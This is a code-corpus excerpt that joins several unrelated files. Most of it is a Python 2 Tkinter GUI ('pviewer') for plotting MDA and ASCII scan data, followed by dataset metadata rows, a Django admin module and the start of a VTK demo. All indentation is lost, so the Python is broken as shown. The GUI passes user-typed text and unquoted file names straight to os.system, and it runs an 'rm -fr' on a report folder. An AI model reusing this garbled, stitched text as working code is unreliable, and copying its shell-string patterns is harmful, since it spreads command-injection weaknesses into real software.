self.label = Entry(master, width = 26 )
self.label.grid(row=1,column=1)
self.label.insert(0,SH['printer'])
return self.label
def apply(self):
SH['printer'] = self.label.get()
writeSH(SH)
class commandSyntax(Dialog):
"Dialog for sending a system command or any executable client"
def body(self,master):
self.title("Command Dialog")
self.commandsyntax = Pmw.EntryField(master, labelpos='w',
label_text='Enter Command:', value='',
command=self.valuechanged)
self.commandsyntax.pack(fill='x')
self.commandsyntax.component('entry').focus_set()
def valuechanged(self):
os.system(self.commandsyntax.get()+ ' &')
def apply(self):
self.destroy()
class pickDIdialog(Dialog):
"Dialog for selecting a text line which contains DI names to be used in multiline plot. If blank comment line picked, sequence number is used."
def body(self,master):
file = Scan['txtfile']
data = readArray(file)
nc = len(data[0])
self.nc = nc
fo = open(file,'r')
lines = fo.read()
fo.close()
lines = string.split(lines,'\n')
self.title("Pick Line where DI Names Resides")
box = Pmw.ScrolledListBox(master,
items=(lines),
labelpos=NW,label_font=SH['font'],
label_text='Extract column legends from the text window\nSelect the text line which contains\nlegends to be extracted for multi-line plot',
selectioncommand=self.selectionCommand,
dblclickcommand=self.selectionCommand,
usehullsize=1,hull_width=700,hull_height=400)
box.pack()
self.box = box
def selectionCommand(self):
box = self.box
sels = box.getcurselection()
sels = string.split(sels[0])
no = len(sels)
dc = no - self.nc
if dc >= 0:
sels = sels[dc:no]
ix = SH['ix']
sel = sels[ix+1:no]
else:
sel = range(self.nc)
V = []
for i in range(85):
V.append('')
for i in range(len(sel)):
V[i] = sel[i]
fo = open('pvs','w')
fo.write(str(V))
fo.close()
Scan['nc'] = len(V)
namedialog = GetLegends(self)
def apply(self):
self.destroy()
class GetXYVdialog(Dialog):
"Dialog to set column or line # of X, Y, DATA array located in the opend ascii 2D image file (generated by scanSee/catcher/yviewer)"
def body(self,master):
try:
font=SH['font'] #'Verdana 10 bold'
self.title("Extract X,Y,DATA array from scanSee ASCII file")
self.ix = [IntVar(),IntVar(),IntVar(),IntVar()]
Label(master,text='X and Data column #:',font=font).grid(row=0,column=0,sticky=W)
Label(master,text='X Vector Column #').grid(row=1,column=1,sticky=W)
Label(master,text='Data Start Column #').grid(row=2,column=1,sticky=W)
Label(master,text='Y Vector Defined in:',font=font).grid(row=3,column=0,sticky=W)
Label(master,text='Y Vector Line #').grid(row=4,column=1,sticky=W)
Label(master,text='Y Start Column #').grid(row=5,column=1,sticky=W)
Entry(master,width=4,textvariable=self.ix[0]).grid(row=1,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[1]).grid(row=2,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[2]).grid(row=4,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[3]).grid(row=5,column=2,sticky=W)
self.ix[0].set(0)
self.ix[1].set(2)
self.ix[2].set(3)
self.ix[3].set(2)
except AttributeError:
return self.ix[0]
def get(self):
return [self.ix[0].get(),self.ix[1].get(),self.ix[2].get(),self.ix[3].get()]
def apply(self):
ix = self.get()
Scan['rowcol'] = ix
file = Scan['txtfile']
if file != '':
data = readArray(file)
nc = len(data)
nr = len(data[0])
data = rowreverse(data)
x = data[ix[0]]
data = data[ix[1]:nr]
data = array(data)
fo = open(file,'r')
lines = fo.read()
            fo.close()
lines = string.split(lines,'\n')
if ix[2] >= 0:
py = lines[ix[2]]
py = string.split(py)
y = py[ix[3]:len(py)]
for i in range(len(y)):
y[i] = string.atof(y[i])
else:
y = range(len(data))
Scan['X'] = x
Scan['Y'] = y
file = Scan['txtfile']
if Scan['updown']:
plot2dUpdown(data,x,y,title=file)
else:
plot2d(data,x,y,title=file)
class defineXYdialog(Dialog):
"Dialog for entering Xmin,Xmax,Ymin,Ymax ranges"
def body(self,master):
try:
file = Scan['txtfile']
data = readArray(file)
data = rowreverse(data)
data = array(data)
nc = data.shape[1]
nr = data.shape[0]
Scan['im'] = data
font=SH['font'] #'Verdana 10 bold'
self.title("Set X, Y Ranges for Image Plot")
self.ix = [StringVar(),StringVar(),StringVar(),StringVar()]
Label(master,text='Enter X Plot Range',font=font).grid(row=0,column=0,sticky=W)
Label(master,text='Xmin').grid(row=1,column=1,sticky=W)
Label(master,text='Xmax').grid(row=2,column=1,sticky=W)
Label(master,text='Enter Y Plot Range',font=font).grid(row=3,column=0,sticky=W)
Label(master,text='Ymin').grid(row=4,column=1,sticky=W)
Label(master,text='Ymax').grid(row=5,column=1,sticky=W)
Entry(master,width=14,textvariable=self.ix[0]).grid(row=1,column=2,sticky=W)
Entry(master,width=14,textvariable=self.ix[1]).grid(row=2,column=2,sticky=W)
Entry(master,width=14,textvariable=self.ix[2]).grid(row=4,column=2,sticky=W)
Entry(master,width=14,textvariable=self.ix[3]).grid(row=5,column=2,sticky=W)
self.ix[0].set(1.)
self.ix[1].set(float(nc))
self.ix[2].set(1.)
self.ix[3].set(float(nr))
except AttributeError:
return self.ix[0]
def get(self):
return [self.ix[0].get(),self.ix[1].get(),self.ix[2].get(),self.ix[3].get()]
def apply(self):
ix = self.get()
ix = [string.atof(ix[0]),string.atof(ix[1]),string.atof(ix[2]),
string.atof(ix[3])]
data = Scan['im']
nr = data.shape[0]
nc = data.shape[1]
x = []
dx = (ix[1]-ix[0])/(nc-1)
for i in range(nc):
x.append(ix[0]+dx*i)
y = []
dy = (ix[3]-ix[2])/(nr-1)
for i in range(nr):
y.append(ix[2]+dy*i)
if Scan['updown']:
plot2dUpdown(data,x,y,title=Scan['txtfile'])
else:
plot2d(data,x,y,title=Scan['txtfile'])
class GetXYdialog(Dialog):
"Dialog for define X,Y vector line and column #"
def body(self,master):
try:
font=SH['font'] #'Verdana 10 bold'
self.title("Get X, Y Vectors from ASCII file")
self.ix = [IntVar(),IntVar(),IntVar(),IntVar()]
Label(master,text='X Vector Defined in:',font=font).grid(row=0,column=0,sticky=W)
Label(master,text='Line #').grid(row=1,column=1,sticky=W)
Label(master,text='Start Column #').grid(row=2,column=1,sticky=W)
Label(master,text='Y Vector Defined in:',font=font).grid(row=3,column=0,sticky=W)
Label(master,text='Line #').grid(row=4,column=1,sticky=W)
Label(master,text='Start Column #').grid(row=5,column=1,sticky=W)
Entry(master,width=4,textvariable=self.ix[0]).grid(row=1,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[1]).grid(row=2,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[2]).grid(row=4,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[3]).grid(row=5,column=2,sticky=W)
# cl = Scan['rowcol']
cl = [3,2,4,2]
self.ix[0].set(cl[0])
self.ix[1].set(cl[1])
self.ix[2].set(cl[2])
self.ix[3].set(cl[3])
except AttributeError:
return self.ix[0]
def get(self):
return [self.ix[0].get(),self.ix[1].get(),self.ix[2].get(),self.ix[3].get()]
def apply(self):
ix = self.get()
Scan['rowcol'] = ix
file = Scan['txtfile']
if file != '':
fo = open(file,'r')
lines = fo.read()
            fo.close()
lines = string.split(lines,'\n')
px = lines[ix[0]]
px = string.split(px)
x = px[ix[1]:len(px)]
for i in range(len(x)):
x[i] = string.atof(x[i])
py = lines[ix[2]]
py = string.split(py)
y = py[ix[3]:len(py)]
for i in range(len(y)):
y[i] = string.atof(y[i])
Scan['X'] = x
Scan['Y'] = y
file = Scan['txtfile']
data = readArray(file)
data = rowreverse(data)
data = array(data)
if Scan['updown']:
plot2dUpdown(data,x,y,title=file)
else:
plot2d(data,x,y,title=file)
class GetXdialog(Dialog):
"Dialog for defining X column # in text file"
def body(self,master):
font=SH['font'] #'Verdana 10 bold'
self.title("1D Multi-Line Plot")
self.ix = IntVar()
Label(master,text='Defined valid X column # from text file:',font=font).pack(anchor=NW)
Label(master,text=Scan['txtfile'],font=font).pack(anchor=NW)
Label(master,text='-1 - No X column defined ').pack(anchor=NW)
Label(master,text=' 0 - X defined at First column').pack(anchor=NW)
Label(master,text=' 1 - X defined at Second column').pack(anchor=NW)
Label(master,text='Enter X Column Index #:',font=font).pack(side=LEFT)
self.ix = Entry(master, width = 4)
self.ix.pack(side=LEFT)
v = self.get()
self.ix.insert(0,v)
return self.ix
def get(self):
# fo.close()
SH = readSH()
ix = SH['ix']
return ix
def apply(self):
ix = self.ix.get()
SH['ix'] = string.atoi(ix)
writeSH(SH)
os.system('plotAscii.py '+Scan['txtfile']+' '+str(ix) +' &')
class pick2Ddetector(Dialog):
"Dialog to pick any detector from the MDA 2D detector list and plot the selected 2D detector image"
def body(self,master):
self.title("Select 2D Detector")
box = Pmw.ScrolledListBox(master,
items=('1','2','3','4'),
labelpos=NW,label_text='Pick Detector',
selectioncommand=self.selectionCommand,
dblclickcommand=self.selectionCommand,
usehullsize=1,hull_width=200,hull_height=200)
box.pack()
self.box = box
def selectionCommand(self):
box = self.box
sels = box.getcurselection()
sels = string.split(sels[0])
sel = string.atoi(sels[0])
Scan['2d'] = sel
d = Scan['data']
pick2d(d,sel,updown=Scan['updown'])
def apply(self):
self.destroy()
class pviewer(AppShell.AppShell):
usecommandarea=1
balloonhelp=1
appversion = '1.0'
appname = 'pviewer'
copyright = 'Copyright ANL-APS-AOD-BCDA. All Rights Reserved'
contactname = 'Ben-chin K Cha'
contactphone = '(630) 252-8653'
contactemail = 'cha@aps.anl.gov'
frameWidth = 800
frameHeight = 500
def unimplemented(self):
pass
def messageMDA(self):
box = Pmw.Dialog(self.interior(),
defaultbutton='OK',title='Info')
w = Label(box.interior(),
text='You need to use File->Open MDA...\n to load in an MDA file first',
padx=10,pady=10).pack()
box.activate()
def messageAscii(self):
box = Pmw.Dialog(self.interior(),
defaultbutton='OK',title='Info')
w = Label(box.interior(),
text='You need to use File->Open Ascii...\n to load in an ASCII file first',
padx=10,pady=10).pack()
box.activate()
def savepvs(self):
file = 'pvs'
V = self.apply()
fd = open(file,'w')
fd.write(str(V))
fd.close()
def createButtons(self):
self.buttonAdd('Exit',
helpMessage='Exit pviewer',
statusMessage='Exit pviewer',
command=self.closeup)
def startup(self):
if os.path.isfile('pviewer.config'):
lines = readST('pviewer.config')
self.mdapath = lines[0]
self.txtpath = lines[1]
print 'self.mdapath=', self.mdapath
print 'self.txtpath=', self.txtpath
else:
self.mdapath = os.curdir
self.txtpath = os.curdir
def closeup(self):
fo = open('pviewer.config','w')
st = [ self.mdapath,self.txtpath]
# print str(st)
fo.write(str(st))
fo.close()
self.quit()
# def addmenuBar(self):
# self.menuBar.addmenu('Setup','Fields for plot legend')
def addMoremenuBar(self):
self.menuBar.addmenuitem('File', 'command', 'Quit this application',
label='Quit',
command=self.closeup)
self.menuBar.addmenuitem('File', 'command', '', label='--------------')
self.menuBar.addmenuitem('File', 'command',
'Setup Printer ...',
label='Printer...',
command=self.printerDialog)
self.menuBar.addmenuitem('File', 'command', '', label='--------------')
self.menuBar.addmenuitem('File', 'command',
'File Selection dialog for Ascii File ...',
label='Open Ascii ...',
command=self.openAscii)
self.menuBar.addmenuitem('File', 'command', '', label='--------------')
self.menuBar.addmenuitem('File', 'command',
'File Selection dialog for MDA File ...',
label='Open MDA ...',
command=self.openMDA)
self.menuBar.addmenuitem('Help', 'command',
'Online help about this application ...',
label='pviewer_help.txt ...',
command=self.openHelpText)
self.menuBar.addmenuitem('Setup','command',
'Pick and load Color Table for 2D image plot ',
label='Color Table...',
command=self.setCTdialog)
self.menuBar.addmenuitem('Setup','command',
'Modify legend field names used in multiline plot',
label='Name Legends...',
command=self.legenddialog)
self.toggleUpdownVar=IntVar()
self.toggleUpdownVar.set(1)
self.menuBar.addmenuitem('Setup','checkbutton',
'Toggle plot2d updown mode',
label='Image Upside Down',
variable=self.toggleUpdownVar,
command=self.updownImage)
self.menuBar.addmenu('MDAView','Various MDAView features')
self.menuBar.addmenuitem('MDAView','command',
'Access 1D Array and pass to multiline plotter...',
label='Multi-line 1D Plot...',
command=self.mda1DRptPlot)
self.menuBar.addmenuitem('MDAView', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAView','command',
'Access panimage window',
label='PanImages...',
command=self.getpanimage)
self.menuBar.addmenuitem('MDAView','command',
'Display 2D image for the select detector',
label='Pick Di Image...',
command=self.get2Ddetector)
self.menuBar.addmenu('MDAReports','Various Report features')
self.menuBar.addmenuitem('MDAReports','command',
'Generate MDA 1D/2D reports',
label='MDA 1D/2D Reports...',
command=self.mdaReport)
self.menuBar.addmenuitem('MDAReports','command',
'Generate sequential MDA 1D report from 2D array',
label='MDA 2D->1D Report...',
command=self.mda2D1DRpt)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Generate MDA report for current MDA directory',
label='Generate All MDA Report...',
command=self.mdaAllRpt)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Generate MDA 2D report in IGOR format',
label='MDA to IGOR Report...',
command=self.mdaIGORRpt)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Show ASCII Report Files',
label='View ASCII Report...',
command=self.showAscii)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Clear All Files in ASCII directory',
label='Remove All Reports...',
command=self.removeAscii)
self.menuBar.addmenu('AsciiView','Various AsciiView features')
self.menuBar.addmenuitem('AsciiView', 'command', '',
label='--------------')
self.menuBar.addmenuitem('AsciiView','command',
'Enter the zero based X column # in ASCII file',
label='Multi-line Plotter...',
command=self.XcolDialog)
self.menuBar.addmenuitem('AsciiView','command',
'Pick line of DI legend name from the ascii file',
label='Extract & Modify Legend...',
command=self.DIlinedialog)
self.menuBar.addmenuitem('AsciiView', 'command', '',
label='--------------')
self.menuBar.addmenuitem('AsciiView', 'command',
'Pass ascii text data to image plot ...',
label='TV Image ...',
command=self.imageAscii)
self.menuBar.addmenu('Ascii2Image','Plot2D Ascii Image features')
self.menuBar.addmenuitem('Ascii2Image', 'command',
'No X,Y vector defined in ascii file',
label='Plot2d...',
command=self.plot2ddialog)
self.menuBar.addmenuitem('Ascii2Image', 'command',
'User set X,Y ranges dialog',
label='X,Y Range for image...',
command=self.XYrangeDialog)
self.menuBar.addmenuitem('Ascii2Image', 'command', '',
label='--------------')
self.menuBar.addmenuitem('Ascii2Image', 'command',
'Extract the X,Y line vectors from mdaAscii generated file',
label='X,Y Line vector from mdaAscii file...',
command=self.XYrowcolDialog)
self.menuBar.addmenuitem('Ascii2Image', 'command', '',
label='--------------')
self.menuBar.addmenuitem('Ascii2Image', 'command',
'Extract X,Y,Data from scanSee/catcher/yviewer generated file',
label='X column, Y line, DATA column from ascii file...',
command=self.XYVDialog)
self.menuBar.addmenu('ScanTools','Various scan programs')
self.menuBar.addmenuitem('ScanTools','command',
'Run plot.py python program',
label='Python plot.py ...',
command=self.runPlot)
self.menuBar.addmenuitem('ScanTools', 'command', '',
label='--------------')
self.menuBar.addmenuitem('ScanTools','command',
'Run idlvm sscan (scanSee) program',
label='idlvm sscan ...',
command=self.runSscan)
self.menuBar.addmenuitem('ScanTools','command',
'Run idlvm catcher (catcher) program',
label='idlvm catcher ...',
command=self.runCatcher)
self.menuBar.addmenuitem('ScanTools','command',
'Run idlvm mca (MCA) program',
label='idlvm mca ...',
command=self.runMCA)
self.menuBar.addmenu('Tools','Various system tools')
self.menuBar.addmenuitem('Tools','command',
'Run start_epics program',
label='start_epics ...',
command=self.runMedm)
self.menuBar.addmenuitem('Tools', 'command', '',
label='--------------')
self.menuBar.addmenuitem('Tools', 'command',
'Enter any valid command syntax ...',
label='Command Dialog...',
command=self.commandDialog)
def runPlot(self):
os.system('plot.py & ')
def runSscan(self):
os.system('idlvm sscan & ')
def runCatcher(self):
os.system('idlvm catcher & ')
def runMCA(self):
os.system('idlvm mca & ')
def runMedm(self):
h = os.getenv('HOME')
os.system(h +'/start_epics & ')
def commandDialog(self):
cmd = commandSyntax(self.interior())
def printerDialog(self):
setupPrinter(self.interior())
def removeAscii(self):
from Dialog import *
# dir = os.getcwd() +os.sep+'ASCII'+os.sep+'*.txt'
dir = self.txtpath+os.sep+'*.txt'
dir = 'rm -fr '+dir
pa = {'title': 'Remove ASCII files',
'text': dir + '\n\n'
'All ascii text files will be removed\n'
'from the sub-directory ASCII.\n'
'Is it OK to remove all files ?\n ',
'bitmap': DIALOG_ICON,
'default': 1,
'strings': ('OK','Cancel')}
dialog = Dialog(self.interior(),pa)
ans = dialog.num
if ans == 0:
print dir
os.system(dir)
def showAscii(self):
fname = tkFileDialog.askopenfilename(initialdir=self.txtpath,initialfile="*txt*")
if fname == (): return
xdisplayfile(fname)
def mdaIGORRpt(self):
if Scan['open']:
d = self.MDA
if d[0]['rank'] < 2:
return
fname = self.mdafile
ofname = mdaAscii_IGOR(d)
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
SH['ix'] = -1
writeSH(SH)
(self.txtpath,fn) = os.path.split(ofname)
else:
self.messageMDA()
def mdaAllRpt(self):
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text='MDA file from: '+self.mdapath,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.pack()
st.settext('Reports saved in: '+os.getcwd()+os.sep+'ASCII')
self.textWid=st
mdaAscii_all(self.mdapath)
def mda2D1DRpt(self):
# d = readMDA.readMDA(fname, 1, 0, 0)
if Scan['open']:
d = self.MDA
if d[0]['rank'] < 2: return
if d[2].nd == 0: return
fname = self.mdafile
ofname = mdaAscii_2D1D(d)
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
Scan['txtfile'] = ofname
SH['ix'] = 0
(self.txtpath,fn) = os.path.split(ofname)
def mda2DRpt(self):
# d = readMDA.readMDA(fname, 1, 0, 0)
if Scan['open']:
d = self.MDA
fname = self.mdafile
if d[1].nd > 0 :
ofname = mdaAscii_1D(d)
if d[0]['rank'] < 2: return
if d[2].nd == 0 : return
ofname = mdaAscii_2D(d)
py = d[1].p[0].data
px = d[2].p[0].data
px = px[0]
Scan['X'] = px
Scan['Y'] = py
Scan['txtfile'] = ofname
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
SH['ix'] = -1
writeSH(SH)
(self.txtpath,fn) = os.path.split(ofname)
else:
self.messageMDA()
def mda1DRptPlot(self):
self.mda1DRpt()
self.plotAscii()
def mdaReport(self):
d = self.MDA
if d[0]['rank'] == 1:
self.mda1DRpt()
if d[0]['rank'] >= 2:
self.mda2DRpt()
def mda1DRpt(self):
# d = readMDA.readMDA(fname, 1, 0, 0)
if Scan['open']:
d = self.MDA
fname = self.mdafile
ofname = mdaAscii_1D(d)
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
Scan['txtfile'] = ofname
SH['ix'] = 0
(self.txtpath,fn) = os.path.split(ofname)
else:
self.messageMDA()
def colorbar(self):
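# Build a 10-row x 256-column ramp (each row runs 0..255) and show it
# as the color-table preview bar via PNGImage.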
W = 256
clrbar =[]
for j in range(10):
clrbar.append(range(W))
clrbar = array(clrbar)
imagebar = PNGImage(self.canvas,clrbar,(2,2))
imagebar.pack(side='top')
self.imagebar = imagebar
def executeCT(self):
sels = self.textWid.getcurselection()
sels = string.split(sels[0])
CT_id = string.atoi(sels[0])
ps = str(CT[CT_id])
fo = open('pal.dat','wb')
fo.write(ps)
fo.close()
self.imagebar.destroy()
self.colorbar()
def setCTdialog(self):
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
CT = readCT()
CT_id=39
frame = self.interior()
self.canvas = Canvas(frame,width=300,height=50)
self.canvas.pack()
self.colorbar()
dname=('0 B-W LINEAR','1 BLUE/WHITE','2 GRN-RED-BLU-WHT',
'3 RED TEMPERATURE','4 BLUE/GREEN/RED/YELLOW','5 STD GAMMA-II',
'6 PRISM','7 RED-PURPLE','8 GREEN/WHITE LINEAR',
'9 GRN/WHT EXPONENTIAL','10 GREEN-PINK','11 BLUE-RED',
'12 16-LEVEL','13 RAINBOW','14 STEPS',
'15 STERN SPECIAL','16 Haze','17 Blue-Pastel-Red',
'18 Pastels','19 Hue Sat Lightness1','20 Hue Sat Lightness2',
'21 Hue Sat Value 1','22 Hue Sat Value 2','23 Purple-Red + Stripes',
'24 Beach','25 Mac Style','26 Eos A',
'27 Eos B','28 Hardcandy','29 Nature',
'30 Ocean','31 Peppermint','32 Plasma',
'33 Blue-Red','34 Rainbow',
'35 Blue Waves','36 Volcano','37 Waves',
'38 Rainbow18','39 Rainbow + white','40 Rainbow + black')
box = Pmw.ScrolledListBox(frame,
labelpos=N,label_text='Color Table #',
items=dname,
listbox_height=5,vscrollmode='static',
selectioncommand= self.executeCT,
dblclickcommand= self.executeCT,
usehullsize=1, hull_width=400, hull_height=200)
# box.pack(fill=BOTH,expand=1,padx=10,pady=10)
box.pack()
self.textWid = box
def selectionCommand(self):
box = self.textWid
sels = box.getcurselection()
sels = string.split(sels[0])
sel = string.atoi(sels[0])
Scan['2d'] = sel
d = self.MDA
pick2d(d,sel,updown=Scan['updown'])
def get2Ddetector(self):
if self.mdafile == '':
self.messageMDA()
return
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
root = self.interior()
d = self.MDA
nd = d[2].nd
dname =[]
for i in range(nd):
lst = str(i) + ' '+d[2].d[i].fieldName +' ' + d[2].d[i].name +' '+ d[2].d[i].desc +' '+d[2].d[i].unit
dname.append(lst)
box = Pmw.ScrolledListBox(root,
labelpos=N,label_text='2D Image Seq #',
items=(dname[0:nd]),
listbox_height=5,vscrollmode='static',
selectioncommand= self.selectionCommand,
dblclickcommand= self.selectionCommand,
usehullsize=1, hull_width=500, hull_height=200)
# box.pack(fill=BOTH,expand=1,padx=10,pady=10)
box.pack()
self.textWid = box
def getpanimage(self):
file = self.mdafile
if file != '':
d = self.MDA
pal = readPalette()
if d[0]['rank'] > 1:
det2D(d[2].d[0:d[2].nd],scale=(1,1),columns=5,file=file,pal=pal)
else:
self.messageMDA()
def headerMDA(self,d,J,st_text):
try:
if d[J].nd > 0:
st_text = st_text+d[J].scan_name+'\n'
st_text = st_text+'NPTS: '+str(d[J].npts)+'\n'
st_text = st_text+'CURR_PT: '+str(d[J].curr_pt)+'\n'
st_text = st_text + '**'+str(J)+'D detectors**\n'
for i in range(d[J].nd):
st_text=st_text+d[J].d[i].fieldName+' : '+d[J].d[i].name+', '+d[J].d[i].desc+', '+d[J].d[i].unit+'\n'
except IndexError:
pass
return st_text
def openMDA(self):
fname = askopenfilename( initialdir=self.mdapath,
filetypes=[("MDA File", '.mda'),
("All Files","*")])
if fname =='':
return
self.mdafile = fname
(self.mdapath, fn) = os.path.split(fname)
d = readMDA(fname)
self.MDA = d
Scan['data'] = d
Scan['open'] = 1
st_text = 'Please use the MDAView menu to access the MDA 1D/2D data arrays\n\n'
try:
if d[1].nd > 0:
st_text = self.headerMDA(d,1,st_text)
if d[1].nd > 0:
V=[]
for i in range(85):
V.append('')
for i in range(d[1].nd):
V[i] = d[1].d[i].fieldName
file='pvs'
fd = open(file,'w')
fd.write(str(V))
fd.close()
except IndexError:
pass
try:
if d[2].nd > 0:
st_text = self.headerMDA(d,2,st_text)
except IndexError:
pass
try:
if d[3].nd > 0:
st_text = self.headerMDA(d,3,st_text)
except IndexError:
pass
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=fname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=1, pady=1)
self.textWid = st
def openHelpText(self):
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
fname = os.environ['PYTHONSTARTUP']+os.sep+'pviewer_help.txt'
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=fname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.importfile(fname)
st.pack(fill=BOTH, expand=1, padx=1, pady=1)
self.textWid = st
def openAscii(self):
fname = askopenfilename(initialdir=self.txtpath,
filetypes=[("ASCII Data", '.txt'),
("Image Files","*im*"),
("Data Files",".dat"),
("All Files","*")])
if fname == '':
return
(self.txtpath,fn) = os.path.split(fname)
Scan['txtfile'] = fname
self.textfile = fname
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=fname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.importfile(fname)
st.pack(fill=BOTH, expand=1, padx=1, pady=1)
self.textWid = st
def imageAscii(self):
if self.textfile != '':
file = self.textfile
data = readArray(file)
data = rowreverse(data)
TV(data)
else:
self.messageAscii()
def plot2ddialog(self):
if self.textfile != '':
file = self.textfile
data = readArray(file)
data = rowreverse(data)
nr = len(data)
nc = len(data[0])
x = range(nc)
y = range(nr)
data = array(data)
if Scan['updown']:
plot2dUpdown(data,x,y,title=file)
else:
plot2d(data,x,y,title=file)
else:
self.messageAscii()
def plotAscii(self):
if self.textfile == '':
self.messageAscii()
return
try:
os.system('plotAscii.py '+self.textfile+' &')
except AttributeError:
pass
def XYrowcolDialog(self):
file = Scan['txtfile']
if file == '':
self.messageAscii()
return
ix = GetXYdialog(self.interior())
def XYVDialog(self):
file = Scan['txtfile']
if file == '':
self.messageAscii()
return
ix = GetXYVdialog(self.interior())
def XYrangeDialog(self):
file = Scan['txtfile']
if file == '':
self.messageAscii()
return
ix = defineXYdialog(self.interior())
def XcolDialog(self):
if self.textfile == '':
self.messageAscii()
else:
Scan['txtfile'] = self.textfile
ix=GetXdialog(self.interior())
def legenddialog(self):
# dialog=GetLegends(self.interior())
GetLegends(self.interior())
def DIlinedialog(self):
file = Scan['txtfile']
if file == '': return
dialog=pickDIdialog(self.interior())
def updownImage(self):
Scan['updown'] = self.toggleUpdownVar.get()
def pick2Ddialog(self):
if Scan['open']:
dialog=pick2Ddetector(self.interior())
def createInterface(self):
AppShell.AppShell.createInterface(self)
self.addMoremenuBar()
# self.createButtons()
self.textWid = None
self.mdafile = ''
self.textfile = ''
self.startup()
if __name__ == '__main__':
SH = {'ix': 0, 'printer': '', 'font': 'Verdana 10 bold', }
if os.path.isfile('SH'):
SH = readSH()
else:
writeSH(SH)
Scan = { 'open': 0,
'2d': 0,
'updown': 1,
'1d': 0,
'nc': 0,
'CT': 39,
'rowcol': [3,2,4,2],
'txtfile': '',
'pvs1': None,
'pvs2': None,
'pvs3': None,
'X': None,
'Y': None,
'im': None,
'data': None }
CT = readCT()
pt = pviewer()
pt.run()
|
bsd-2-clause
| -3,291,895,447,585,921,000
| 27.987974
| 146
| 0.633361
| false
| 2.725818
| false
| false
| false
|
c0cky/mediathread
|
mediathread/projects/admin.py
|
1
|
1386
|
from django.contrib import admin
from django.contrib.auth.models import User
from mediathread.projects.models import Project
class ProjectAdmin(admin.ModelAdmin):
search_fields = ("title",
"participants__last_name", "author__username",
"participants__last_name")
list_display = ("title", "course", "author", "modified",
"date_submitted", "id", "project_type",
"response_view_policy")
filter_horizontal = ('participants',)
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "author":
kwargs["queryset"] = User.objects.all().order_by('username')
return super(ProjectAdmin, self).formfield_for_foreignkey(db_field,
request,
**kwargs)
def formfield_for_manytomany(self, db_field, request, **kwargs):
if db_field.name == "participants":
kwargs["queryset"] = User.objects.all().order_by('username')
return super(ProjectAdmin, self).formfield_for_manytomany(db_field,
request,
**kwargs)
admin.site.register(Project, ProjectAdmin)
|
gpl-2.0
| 7,909,254,326,937,188,000
| 43.709677
| 75
| 0.519481
| false
| 4.95
| false
| false
| false
|
lorensen/VTKExamples
|
src/Python/Deprecated/GeometricObjects/ParametricObjectsDemo.py
|
1
|
5485
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vtk
def main():
colors = vtk.vtkNamedColors()
colors.SetColor("BkgColor", [26, 51, 102, 255])
parametricObjects = list()
parametricObjects.append(vtk.vtkParametricBoy())
parametricObjects.append(vtk.vtkParametricConicSpiral())
parametricObjects.append(vtk.vtkParametricCrossCap())
parametricObjects.append(vtk.vtkParametricDini())
parametricObjects.append(vtk.vtkParametricEllipsoid())
parametricObjects[-1].SetXRadius(0.5)
parametricObjects[-1].SetYRadius(2.0)
parametricObjects.append(vtk.vtkParametricEnneper())
